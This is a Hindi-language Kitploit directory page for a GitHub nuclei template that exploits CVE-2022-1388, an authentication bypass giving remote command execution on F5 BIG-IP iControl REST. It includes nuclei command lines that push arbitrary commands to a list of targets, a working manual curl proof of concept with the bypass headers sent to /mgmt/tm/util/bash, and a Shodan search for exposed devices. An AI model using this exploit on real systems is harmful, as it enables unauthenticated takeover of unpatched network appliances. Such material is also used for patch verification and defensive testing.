Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Nuclei-Template-Exploit-F5-BIG-IP-iControl-REST-Auth-Bypass-RCE-Command-Parameter — CVE-2022-1388 BIG-IP के iControl API के REST घटक में एक प्रमाणीकरण बायपास भेद्यता है जिसे CVSSv3 स्कोर 9.8 दिया गया था। iControl REST API का उपयोग BIG-IP उपकरणों के प्रबंधन और कॉन्फ़िगरेशन के लिए किया जाता है। CVE-2022-1388 का शोषण BIG-IP का उपयोग करने वाले उपकरणों के प्रबंधन पोर्ट या स्वयं IP पते तक नेटवर्क पहुंच वाले अनप्रमाणित हमलावर द्वारा किया जा सकता है। शोषण से हमलावर को मनमाने सिस्टम कमांड निष्पादित करने, फ़ाइलें बनाने और हटाने और सेवाओं को अक्षम करने की अनुमति मिलती है। | Kitploit
उपकरण/GitHubGitHub/mrcl0wnlab/nuclei-template-exploit-f5-big-ip-icontrol-rest-auth-bypass-rce-command-parameter
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubmrcl0wnlab/nuclei-template-exploit-f5-big-ip-icontrol-rest-auth-bypass-rce-command-parameter

Nuclei-Template-Exploit-F5-BIG-IP-iControl-REST-Auth-Bypass-RCE-Command-Parameter

रिपॉजिटरी देखें
624 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

CVE-2022-1388 BIG-IP के iControl API के REST घटक में एक प्रमाणीकरण बायपास भेद्यता है जिसे CVSSv3 स्कोर 9.8 दिया गया था। iControl REST API का उपयोग BIG-IP उपकरणों के प्रबंधन और कॉन्फ़िगरेशन के लिए किया जाता है। CVE-2022-1388 का शोषण BIG-IP का उपयोग करने वाले उपकरणों के प्रबंधन पोर्ट या स्वयं IP पते तक नेटवर्क पहुंच वाले अनप्रमाणित हमलावर द्वारा किया जा सकता है। शोषण से हमलावर को मनमाने सिस्टम कमांड निष्पादित करने, फ़ाइलें बनाने और हटाने और सेवाओं को अक्षम करने की अनुमति मिलती है।

साझा करें

Nuclei Template Exploit F5 BIG-IP iControl REST Auth Bypass RCE | Command Parameter

CVE-2022-1388, BIG-IP के iControl API के REST घटक में एक प्रमाणीकरण बायपास भेद्यता है, जिसे CVSSv3 स्कोर 9.8 दिया गया है। iControl REST API का उपयोग BIG-IP उपकरणों के प्रबंधन और कॉन्फ़िगरेशन के लिए किया जाता है। CVE-2022-1388 का शोषण एक अप्रमाणित हमलावर द्वारा किया जा सकता है जिसके पास प्रबंधन पोर्ट या BIG-IP का उपयोग करने वाले उपकरणों के स्वयं IP पतों तक नेटवर्क पहुंच हो। शोषण से हमलावर मनमाने सिस्टम कमांड निष्पादित कर सकता है, फ़ाइलें बना और हटा सकता है, और सेवाओं को अक्षम कर सकता है।

यह टेम्पलेट token-spray / nuclei के CLI वेरिएबल का उपयोग करता है

यह nuclei-टेम्पलेट शोषण के लिए शेल पैरामीटर स्वीकार करता है। हम किसी अन्य वर्कफ़्लो या मैन्युअल खोज से प्राप्त टोकन का परीक्षण करना चाहते थे, इसलिए हमने रन टाइम पर इन टेम्पलेट्स में एकल टोकन मान या टोकन की सूची को गतिशील रूप से फीड करने के लिए nuclei के CLI वेरिएबल सुविधा का उपयोग किया।

-V, -var value var=value प्रारूप में कस्टम वेरिएबल

root@kitploit:~
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=commands.txt
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=uname -a

Captura de tela de 2022-05-10 01-28-12

POC मैन्युअल

root@kitploit:~
curl -su admin \ 
-H "Host: localhost:8100" \ 
-H "Content-Type: application/json" \ 
-H "Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a" \ 
-H "Authorization: Basic YWRtaW46" \
 http://{{TARGET_IP}}/mgmt/tm/util/bash \
-d '{"command":"run","utilCmdArgs":"-c id"}'

अतिरिक्त विवरण

  • https://www.shodan.io/search?query=http.title%3A%22BIG-IP%26reg%3B-+Redirect%22

संदर्भ

  • https://blog.projectdiscovery.io/nuclei-v2-5-release/
  • https://clouddocs.f5.com/products/big-iq/mgmt-api/v5.4/ApiReferences/bigiq_api_ref/r_auth_login.html
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
  • https://github.com/alt3kx/CVE-2022-1388_PoC
  • https://github.com/dorkerdevil/CVE-2021-22986-Poc/blob/main/README.md
  • https://github.com/horizon3ai/CVE-2022-1388/blob/main/CVE-2022-1388.py
  • https://github.com/numanturle/CVE-2022-1388/blob/main/bigip-icontrol-rest-rce.y
  • https://github.com/tenable/audit_files/tree/master/cve-2022-1388
  • https://support.f5.com/csp/article/K23605346
  • https://thehackernews.com/2022/05/f5-warns-of-new-critical-big-ip-remote.html
  • https://twitter.com/1ZRR4H/status/1522165718975922178
  • https://www.tenable.com/blog/cve-2022-1388-authentication-bypass-in-f5-big-ip
टूल डाउनलोड करें